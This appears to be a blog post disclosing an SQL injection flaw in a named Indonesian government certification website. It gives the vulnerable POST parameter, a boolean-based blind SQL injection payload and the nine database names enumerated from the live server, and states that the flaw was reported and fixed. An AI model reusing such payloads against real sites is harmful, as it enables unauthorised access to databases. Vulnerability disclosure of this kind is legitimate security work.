Wednesday, December 19, 2018

Bugs http://ppsdmmigas.esdm.go.id/sertifikasi/

DOMAIN : http://ppsdmmigas.esdm.go.id/sertifikasi/
BUGS : SQL Injection
DATE : 15 December 2018
LEVEL : High Risk

POST parameter 'kategori' is vulnerable.

Parameter: kategori (POST)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - Parameter replace
    Payload: kategori=(SELECT (CASE WHEN (6253=6253) THEN 6253 ELSE 6253*(SELECT 6253 FROM INFORMATION_SCHEMA.PLUGINS) END))&keyword=admin

---

available databases [9]:
[*] dimigas
[*] dimigas_javan
[*] dmigas_javan_bak
[*] information_schema
[*] mysql
[*] phpmyadmin
[*] sertifikasi
[*] smscenter
[*] wordpress

---
Reported on 15 December 2018.
Status : Fixed.



